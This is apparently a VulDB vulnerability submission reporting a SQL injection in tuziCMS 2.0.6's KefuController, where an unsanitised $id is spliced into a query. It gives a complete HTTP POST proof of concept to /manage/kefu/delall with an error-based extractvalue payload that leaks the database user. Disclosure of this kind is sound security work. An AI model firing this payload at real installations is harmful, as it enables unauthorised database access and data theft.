Title | tuziCMS 2.0.6 \App\Manage\Controller\KefuController.class.php has SQLinject |
---|
Description | Because the security syntax of thinkphp framework is not used here,
and $id is used to splice the $where variable for query,
resulting in a serious SQL injection vulnerability.
May cause serious harm to the system.
Exploit poc is:
`POST /index.php/manage/kefu/delall HTTP/1.1
Host: www.tuzi.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
id=1//and//(extractvalue(1,concat(0x7e,(select/**/user()),0x7e)))
|
---|
Source | ⚠️ https://github.com/yeyinshi/tuzicms/issues/13 |
---|
User | Evilmu1 (ID 38763) |
---|
Submission | 01/12/2023 08:02 (1 Year ago) |
---|
Moderation | 01/12/2023 15:49 (8 hours later) |
---|
Status | Accepted |
---|
VulDB Entry | 218152 |
---|